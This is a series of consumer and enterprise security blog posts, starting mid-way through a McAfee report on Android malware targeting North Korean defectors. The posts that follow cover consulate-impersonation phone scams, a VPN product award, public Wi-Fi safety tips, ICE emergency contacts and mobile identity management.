In our post of the earlier attack by this actor, we observed that some of the Korean words found on the malware’s control server are not in South Korean vocabulary and that an exposed IP address points to North Korea. Also, Dropbox accounts were names from South Korean drama or celebrities.

In the new malware on Google Play, we again see that the Korean writing in the description is awkward. As in the previous operation, the Dropbox account name follows a similar pattern of using names of celebrities, such as Jack Black, who appeared on Korean TV. These features are strong evidence that the actors behind these campaigns are not native South Koreans but are familiar with the culture and language. These elements are suggestive though not a confirmation of the nationality of the actors behind these malware campaigns.

Sun Team’s test devices originate from various countries.

Moreover, we uncovered information about the attacker’s Android test devices and exploits they tried to use. The devices are manufactured in several countries and carry installed Korean apps, another clue that the threat actors can read Korean. The exploits codes were found uploaded on one of the cloud storages used by Sun Team which are modified versions of publicly available sandbox escape, privilege escalation, code execution exploits that added functions to drop their own Trojans on victims’ devices. The modified exploits suggest that the attackers are not skillful enough to find zero days and write their own exploits. However, it is likely just a matter of time before they start to exploit vulnerabilities.

Modified exploits installing the Sun Team’s Trojan.

The most concerning thing about this Sun Team operation is that they use photos uploaded on social network services and identities of South Koreans to create fake accounts. We have found evidence that some people have had their identities stolen; more could follow. They are using texting and calling services to generate virtual phone numbers so they can sign up for South Korean online services.

Conclusion

This malware campaign used Facebook to distribute links to malicious apps that were labeled as unreleased versions. From our analysis, we conclude that the actor behind both campaigns is Sun Team. Be cautious when installing unreleased or beta versions of any app. Also, check the number of downloads to see if an app is widely installed; avoid obscure apps.

McAfee Mobile Security detects this malware as Android/RedDawn.A, B. Always keep your mobile security application updated to the latest version.

The post Malware on Google Play Targets North Korean Defectors appeared first on McAfee Blogs.

Wrong Number: Phone Scammers Run Off With Millions by Impersonating Chinese Consulate Staff

Remember prank calls? We all used to make them as kids as a way to fake out friends and classmates. The age-old tradition isn’t just exclusive to teens, however, as cybercriminals still use the tactic modern day. Only their intentions are a bit more malicious than your average middle schooler. In fact, just this week, phone scammers pretending to be from a Chinese Consulate office are tricking people in the U.S. into giving them large amounts of money.

First reported to The Verge, the Federal Trade Commission announced that it believes scammers are targeting people who have recently immigrated from China to the U.S. and have been asking these people to pick up packages or provide personal data to the “consulate staff.” Conveniently enough, this data is largely financial information. Unfortunately, the scam has seen some success, as the New York Police Department has reported that 21 Chinese immigrants have been scammed out of $2.5 million since December 21st, 2017. The majority of these victims are seniors.

This isn’t the first we’ve heard of phone scammers taking advantage of innocent people – as many out there have fallen victim to easily believable social engineering schemes such as this. Therefore, in order to avoid tricky scams like this one, be sure to follow these tips: 

  • Don’t give up your financial data to anyone other than your bank. If you receive a phone call from either a person or a recording requesting this data, remain skeptical and hang up. Then, call your official bank directly and check with them if there’s an issue you need to discuss.
  • Keep up-to-date on the latest social engineering scams. It’s important you stay in the loop so you know what scams to look out for. This means reading up the latest security news and knowing what’s real and what’s fake when it comes to random emails, phone calls, and text messages.
  • Reduce your exposure. Register your mobile phone number, as well as your home phone, on the “do not call” registry to keep your number uninvolved in the latest social engineering scheme.
  • Use an identity theft protection solution. If for some reason a scammer does compromise your personal information, it’s important to get prepared about protecting yourself against identity theft. McAfee Identity Theft Protection allows users to take a proactive approach to protecting their identities with personal and financial monitoring and recovery tools to help keep their identities personal and secured.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Wrong Number: Phone Scammers Run Off With Millions by Impersonating Chinese Consulate Staff appeared first on McAfee Blogs.

McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards®

On February 28th, Info Security Products Guide Global Excellence Awards presented their 2018 award winners. We are humbled to have received two golds in the Product or Service Excellence of the Year — Security Information and Website & Web Application Security for McAfee Safe Connect.

Product Overview:

McAfee Safe Connect is a VPN (Virtual Private Network) that helps users create secure online connections while using the internet.  Doing so helps our customers minimize their individual security risks and helps keep their data private – especially when connecting to a public or open Wi-Fi network. Unlike home Wi-Fi, many public Wi-Fi networks (commonly offered at cafés, airports and hotels) aren’t password-protected and don’t encrypt the user data being transmitted through. Therefore, when you connect to a hotspot, your online activities from your social media activity to your online purchase history and even your bank account credentials may be wide open to hackers. With McAfee Safe Connect, you can rest assured that your information and online activities are encrypted.

McAfee has a proven record of providing security for consumers in the digital age. To address growing concerns over Wi-Fi security, we created an award-winning VPN that would keep users’ personal information secure from online threats and unsecure networks.

McAfee Safe Connect has over 1 million downloads across Google Play and the App Store with an impressive 4.3-star rating. It is available in over 20 languages to users worldwide.

Tech behemoth Samsung also chose McAfee Safe Connect VPN for their Galaxy Note 8 – Secure Wi-Fi feature and expanded collaboration with its newly announced Galaxy S9 Smartphones.

About Info Security PG’s Global Excellence Awards

Info Security Products Guide sponsors the Global Excellence Awards and plays a vital role in keeping individuals informed of the choices they can make when it comes to protecting their digital resources and assets. The guide is written expressly for those who wish to stay informed about recent security threats and the preventive measure they can take. You will discover a wealth of information in this guide including tomorrow’s technology today, best deployment scenarios, people and technologies shaping cyber security and industry predictions & directions that facilitate in making the most pertinent security decisions. Visit www.infosecurityproductsguide.com for the complete list of winners.

We are proud of recognition given to McAfee Safe Connect, which aims to safeguard every Internet user’s online privacy. Please check out our award-winning Wi-Fi Privacy VPN product: McAfee Safe Connect.

Interested in learning more about McAfee Safe Connect and mobile security tips and trends? Follow @McAfee_Home on Twitter, and ‘Like’ us on Facebook.

The post McAfee Safe Connect, Two Gold Award Winners of 2018 Info Security PG’s Global Excellence Awards® appeared first on McAfee Blogs.

The Do’s and Don’ts when using Public Wi-Fi

Curl up in a chair at your favorite coffee house, the aroma of premium coffee filling the air, take a few sips of your 700 calorie latte, and then enter cyberspace. Little do you know that you could have a stalker. Or two. Or 3,000. Because public Wi-Fi is there for the picking for hackers. Online transmissions can be intercepted. The credit card number that you enter onto that retailer’s site can be “seen.”

Don’t Do These at a Public Wi-Fi Site

  • Never leave your spot without your device on you—not even for a moment. You may come back and still see your computer where you left it…but a thief may have installed a keylogger into it to capture your keystrokes.
  • Do not e-mail messages of a sensitive or serious nature.
  • When your computer begins seeking out a network to connect to…do not let it just drift to the first one it wants; see if you can choose one.
  • Don’t leave on your file sharing.
  • If you’re not using your wireless card, then do not leave it on.
  • Don’t do banking or any other sensitive activities.
  • Don’t position your device so that someone nearby can see the screen.

Yes, Do These when at a Public Wi-Fi Spot

  • Look around before you settle into a nice spot.
  • Sit somewhere so that your back is facing a wall.
  • Assume all Wi-Fi links are suspicious—kind of like assuming all drivers are drunk whenever you go out driving. A wireless link may have been set up by a hacker.
  • See if you can confirm that a given Wi-Fi link is legitimate.
  • Assume that if the connection name is similar to the Wi-Fi spot, that this could mean that the hacker was clever. Inquire of the manager of the coffee shop, hotel, etc., for information about their Wi-Fi access point.
  • You should consider using your cell phone for sensitive activities such as online shopping.
  • But cell phone or not, see if you could avoid visiting sites that can make it easier for hackers to nab your data—sites such as banking, social media and any site where your credit card information is stored.

Use a VPN. This stands for virtual private network. What a VPN does is create an impervious tunnel through which your data travels. Hackers cannot penetrate this tunnel, nor can they “see” through it. Your data is safe. The tunnel encrypts all of your banking and other sensitive transactions, as well as sensitive e-mail communications, plus downloads, you name it. With a virtual private network, you will not have to worry about a thief or snoop intercepting your transmissions.

Robert Siciliano is an Identity Theft Expert to Hotspot Shield. He is the author of 99 Things You Wish You Knew Before Your Identity Was Stolen See him discussing internet and wireless security on Good Morning America. Disclosures.

ICE in your mobile. Sounds great, but is it really a good idea?

Another Internet and Facebook chain letter you no doubt have seen. Paramedics recommend adding a contact record named ICE in your mobile phone. It stands for In Case of Emergency and helps contacting your closest relatives if you have an accident. Sounds great, but let’s take a closer look first.

This is actually not a typical hoax chain letter because it’s based on facts. The idea emerged in UK in 2005, and was indeed introduced by paramedics. It’s a novel idea with good intentions and might have worked in the era before the smartphone. But it’s badly outdated now. I sincerely hope that people start circulating updated instructions rather than the original 10 years old idea.

Here’s why.

  • First, ICE is a nice idea. But it’s NOT the primary interest of paramedics. Their job is to save your life. They are going to concentrate on that rather than playing with your gadget. But ICE-info may still come in handy later at the hospital when the dust settles a bit.
  • Knowledge of some medical conditions is important to paramedics helping a trauma patient. Persons with conditions of this kind wear special medical IDs, necklaces or bracelets, and paramedics are trained to look for them. This has nothing to do with ICE.
  • Our smartphone is a key to all our on-line accounts, e-mail, Facebook, Twitter, cloud storage, you name it. It MUST be locked with a good password, otherwise you take a huge digital risk. And that unfortunately kills the idea with an ICE phonebook record. It’s not worth leaving the phone unprotected because of the ICE-record. Don’t even consider that!
  • Sometimes good old low-tech solutions are far better than digital technology. This is one of those cases. Write the ICE info on a sticker and put it on your phone or anything you carry with you. ID papers, like your driving license, are probably the best items as they are likely to be brought with you to the hospital.
  • If you are a bit nerdy, like me, you may still want a digital solution. Check your mobile for a function or app that puts free form text on the lock screen and use it for ICE. Some phones may even have a separate ICE function for this purpose. But use it as a complement to the good old sticker, not as a replacement.

So to summarize. ICE is in theory a good idea, but not really crucial for your survival. It’s not worth sacrificing your digital safety for it. Especially when you simply need a pen and paper to create an ICE record that is more reliable, safer and easier to use!

 

Safe surfing,
Micke

 

PS. Full medical ID can also be put on the mobile’s lock screen, at least on Android and iPhone. I’m not sure if this is a good idea. A solid necklace of stainless steel somehow feels better for stuff that can mean the difference between life and death. A complement to the necklace is of course never wrong but I really hope that nobody who really needs it trust this as their only medical ID!

 

Image by Ragesoss through Wikimedia

 

The Evolution of Mobile Security

Today, I posted a blog entry to the Oracle Identity Management blog titled Analyzing How MDM and MAM Stack Up Against Your Mobile Security Requirements. In the post, I walk through a quick history of mobile security starting with MDM, evolving into MAM, and providing a glimpse into the next generation of mobile security where access is managed and governed along with everything else in the enterprise. It should be no surprise that's where we're heading but as always I welcome your feedback if you disagree.

Here's a brief excerpt:
Mobile is the new black. Every major analyst group seems to have a different phrase for it but we all know that workforces are increasingly mobile and BYOD (Bring Your Own Device) is quickly spreading as the new standard. As the mobile access landscape changes and organizations continue to lose more and more control over how and where information is used, there is also a seismic shift taking place in the underlying mobile security models.
Mobile Device Management (MDM) was a great first response by an Information Security industry caught on its heels by the overwhelming speed of mobile device adoption. Emerging at a time when organizations were purchasing and distributing devices to employees, MDM provided a mechanism to manage those devices, ensure that rogue devices weren’t being introduced onto the network, and enforce security policies on those devices. But MDM was as intrusive to end-users as it was effective for enterprises.
Continue Reading

IAM for the Third Platform

As more people are using the phrase "third platform", I'll assume it needs no introduction or explanation. The mobile workforce has been mobile for a few years now. And most organizations have moved critical services to cloud-based offerings. It's not a prediction, it's here.

The two big components of the third platform are mobile and cloud. I'll talk about both.

Mobile

A few months back, I posed the question "Is MAM Identity and Access Management's next big thing?" and since I did, it's become clear to me that the answer is a resounding YES!

Today, I came across a blog entry explaining why Android devices are a security nightmare for companies. The pain is easy to see. OS Updates and Security Patches are slow to arrive and user behavior is, well... questionable. So organizations should be concerned about how their data and applications are being accessed across this sea of devices and applications. As we know, locking down the data is not an option. In the extended enterprise, people need access to data from wherever they are on whatever device they're using. So, the challenge is to control the flow of information and restrict it to proper use.

So, here's a question: is MDM the right approach to controlling access for mobile users? Do you really want to stand up a new technology silo that manages end-user devices? Is that even practical? I think certain technologies live a short life because they quickly get passed over by something new and better (think electric typewriters). MDM is one of those. Although it's still fairly new and good at what it does, I would make the claim that MDM is antiquated technology. In a BYOD world, people don't want to turn control of their devices over to their employers. The age of enterprises controlling devices went out the window with Blackberry's market share.

Containerization is where it's at. With App Containerization, organizations create a secure virtual workspace on mobile devices that enables corporate-approved apps to access, use, edit, and share corporate data while protecting that data from escape to unapproved apps, personal email, OS malware, and other on-device leakage points. For enterprise use-case scenarios, this just makes more sense than MDM. And many of the top MDM vendors have validated the approach by announcing MAM offerings. Still, these solutions maintain a technology silo specific to remote access which doesn't make much sense to me.

As an alternate approach, let's build MAM capabilities directly into the existing Access Management platform. Access Management for the third platform must accommodate for mobile device use-cases. There's no reason to have to manage mobile device access differently than desktop access. It's the same applications, the same data, and the same business policies. User provisioning workflows should accommodate for provisioning mobile apps and data rights just like they've been extended to provision Privileged Account rights. You don't want or need separate silos.

Cloud

The same can be said, for cloud-hosted apps. Cloud apps are simply part of the extended enterprise and should also be managed via the enterprise Access Management platform.

There's been a lot of buzz in the IAM industry about managing access (and providing SSO) to cloud services. There have even been a number of niche vendors pop-up that provide that as their primary value proposition. But, the core technologies for these stand-alone solutions is nothing new. In most cases, it's basic federation. In some cases, it's ESSO-style form-fill. But there's no magic to delivering SSO to SaaS apps. In fact, it's typically easier than SSO to enterprise apps because SaaS infrastructures are newer and support newer standards and protocols (SAML, REST, etc.)

My Point

I guess if I had to boil this down, I'm really just trying to dispel the myths about mobile and cloud solutions. When you get past the marketing jargon, we're still talking about Access Management and Identity Governance. Some of the new technologies are pretty cool (containerization solves some interesting, complex problems related to BYOD). But in the end, I'd want to manage enterprise access in one place with one platform. One Identity, One Platform. I wouldn't stand up a IDaaS solution just to have SSO to cloud apps. And I wouldn't want to introduce an MDM vendor to control access from mobile devices.

The third platform simply extends the enterprise beyond the firewall. The concept isn't new and the technologies are mostly the same. As more and newer services adopt common protocols, it gets even easier to support increasingly complex use-cases. An API Gateway, for example, allows a mobile app to access legacy mainframe data over REST protocols. And modern Web Access Management (WAM) solutions perform device fingerprinting to increase assurance and reduce risk while delivering an SSO experience. Mobile Security SDKs enable organizations to build their own apps with native security that's integrated with the enterprise WAM solution (this is especially valuable for consumer-facing apps).

And all of this should be delivered on a single platform for Enterprise Access Management. That's third-platform IAM.

Is MAM Identity and Access Management’s next big thing?

Mobile Application Management is making waves. Recent news from Oracle, IBM, and Salesforce highlight the market interest. It's a natural extension of what you've been hearing at Identity trade shows over the past few years (and this year's Gartner IAM Summit was no exception). The third platform of computing is not a future state. It's here. And Identity and Access solutions are adapting to accommodate the new use case scenarios. ...onward and upward.

[Update - interesting discussion of the IAM technology stack for mobile by SIMIEO]